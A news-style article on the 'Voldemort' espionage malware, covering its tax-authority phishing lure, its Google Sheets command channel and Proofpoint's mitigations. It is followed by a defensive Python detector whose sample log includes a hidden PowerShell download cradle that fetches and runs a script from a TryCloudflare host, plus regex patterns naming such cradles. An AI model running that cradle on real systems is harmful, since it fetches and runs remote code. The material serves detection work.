Proofpoint researchers have uncovered a new malware strain named “Voldemort,” which is being delivered through phishing emails that impersonate government tax authorities. Once on a victim machine, the malware uses Google Sheets as its command-and-control channel, which helps it blend into legitimate traffic, avoid detection and reach sensitive data.
The campaign targets a range of sectors including insurance, aerospace, transport, and education, with the aim of gaining a foothold inside company and organizational networks. The identity of the attackers remains unknown, but Proofpoint assesses that the campaign is most likely part of a broader cyber espionage effort rather than a financially motivated one.
The phishing emails associated with Voldemort are crafted to appear as though they come from tax authorities in the USA, Europe, or Asia. Each email is tailored to the country in which the targeted organization is based, which the attackers determine from publicly available information, to make the lure more convincing. The emails contain links that supposedly lead to documents with “updated tax information,” designed to get recipients to click and ultimately run the malware.
Since the campaign began on August 5, 2024, over 20,000 phishing emails have been sent to more than 70 targeted organizations, with up to 6,000 messages on the busiest days. When a recipient clicks the provided link, they are led to a file that is disguised as a PDF but is in fact a shortcut that starts the infection chain and ultimately loads the malware.
Once installed, Voldemort uses Google Sheets as its command-and-control server: it reads commands from and writes results to a spreadsheet through Google’s API, authenticating with access credentials embedded in the malware. Because the traffic goes to Google’s own API endpoints, it looks like ordinary business traffic and is unlikely to be flagged by security systems. The malware is designed not only to steal data but also to perform further actions on command, such as downloading and running additional payloads, deleting files, or sleeping for a period before resuming, which makes it a highly adaptable threat.
To protect against Voldemort, Proofpoint recommends several preventive measures: restrict access to external file-sharing services to known, safe-listed servers; block network connections to TryCloudflare unless they are required; and monitor for and alert on suspicious PowerShell execution. Implementing these measures can help reduce the risk posed by this campaign.
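The three recommendations above, together with the Google Sheets C2 channel described earlier, translate directly into detection logic. The following is an added example, not code from Proofpoint or from the original report: a toy detector that scans constructed endpoint log lines for connections to TryCloudflare tunnels, file shares outside a safe-list, non-browser processes talking to the Google Sheets API, and PowerShell launched with typical evasion or download-cradle switches. The log format, the hostnames, the process names and the PowerShell heuristics are all assumptions made for the example.

```python
"""Toy detector for the controls the article recommends against Voldemort.

The log format, sample events and heuristics below are constructed for this
example; they are not Proofpoint's rules or indicators.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Processes expected to talk to Google Sheets on a workstation (assumption).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Assumed safe-list of external file-sharing hosts the organisation actually uses.
ALLOWED_SHARING_HOSTS = {"files.example.com"}

# Illustrative "unusual PowerShell" heuristics: hidden window, no profile,
# policy bypass, encoded commands, and common download cradles.
PS_SUSPICIOUS = re.compile(
    r"-(?:windowstyle\s+hidden|w\s+hidden|noprofile|nop|executionpolicy\s+bypass|ep\s+bypass"
    r"|encodedcommand\s|enc\s|e\s)"
    r"|\b(?:iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|net\.webclient)\b",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    detail: str


def _hostname(url):
    """Lower-cased hostname of an http(s) URL, or '' if unparsable."""
    return (urlparse(url).hostname or "").lower()


def _share_host(dest):
    """Host part of a UNC path such as \\\\host\\share or \\\\host@SSL\\DavWWWRoot\\x.

    Returns None when the destination is not a UNC path.
    """
    if not dest.startswith("\\\\"):
        return None
    first = dest[2:].split("\\", 1)[0]
    return first.split("@", 1)[0].lower()


def check_network(host, process, dest):
    """Apply the network-side rules to one connection event."""
    share_host = _share_host(dest)
    name = share_host if share_host is not None else _hostname(dest)
    found = []
    # Rule 1: TryCloudflare tunnels, which the article says to block unless needed.
    if name == "trycloudflare.com" or name.endswith(".trycloudflare.com"):
        found.append(Alert("trycloudflare_tunnel", host, f"{process} -> {name}"))
    # Rule 2: external file shares that are not on the safe-list.
    if share_host is not None and share_host not in ALLOWED_SHARING_HOSTS:
        found.append(Alert("unapproved_file_share", host, f"{process} -> {dest}"))
    # Rule 3: a non-browser process using the Sheets API (the C2 channel described).
    if name == "sheets.googleapis.com" and process.lower() not in BROWSERS:
        found.append(Alert("sheets_api_non_browser", host, f"{process} -> {name}"))
    return found


def check_process(host, process, cmdline):
    """Apply the PowerShell heuristics to one process-start event."""
    if process.lower() not in {"powershell.exe", "pwsh.exe"}:
        return []
    if PS_SUSPICIOUS.search(cmdline):
        return [Alert("suspicious_powershell", host, cmdline)]
    return []


def parse_event(line):
    """Constructed format: '<ts> <host> <process> <dest>' for network events and
    '<ts> <host> <process> CMD <command line>' for process-start events."""
    ts, host, process, rest = line.split(maxsplit=3)
    if rest.startswith("CMD "):
        return ("process", ts, host, process, rest[4:])
    return ("network", ts, host, process, rest)


def scan(lines):
    """Run every rule over the log and return the alerts in log order."""
    alerts = []
    for line in lines:
        kind, _ts, host, process, payload = parse_event(line)
        if kind == "network":
            alerts.extend(check_network(host, process, payload))
        else:
            alerts.extend(check_process(host, process, payload))
    return alerts


# Constructed sample log: one benign browser visit, a WebDAV share behind a
# TryCloudflare tunnel, a hidden-window PowerShell cradle, an unknown binary
# talking to the Sheets API, an approved share, and a benign PowerShell script.
SAMPLE_LOG = """\
2024-08-15T09:01:02Z ws-17 chrome.exe https://docs.google.com/spreadsheets/d/EXAMPLE/edit
2024-08-15T09:01:40Z ws-17 explorer.exe \\\\abc-def.trycloudflare.com@SSL\\DavWWWRoot\\documents
2024-08-15T09:02:10Z ws-17 powershell.exe CMD powershell.exe -w hidden -nop -c "iex (New-Object Net.WebClient).DownloadString('https://abc-def.trycloudflare.com/p.ps1')"
2024-08-15T09:02:30Z ws-17 updater.exe https://sheets.googleapis.com/v4/spreadsheets/EXAMPLE/values/A1
2024-08-15T09:03:00Z ws-17 explorer.exe \\\\files.example.com\\finance
2024-08-15T09:03:20Z ws-17 powershell.exe CMD powershell.exe -File C:\\scripts\\inventory.ps1
""".splitlines()

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"[{alert.rule}] {alert.host}: {alert.detail}")
```

The Sheets rule is the one most specific to this campaign: blocking the Google Sheets API outright is rarely an option, but a process that is not a browser (or a known Google client) reading and writing a spreadsheet over the API is unusual on a workstation and is worth an alert. The PowerShell heuristics are deliberately broad and will need tuning against the organisation's own administrative scripts.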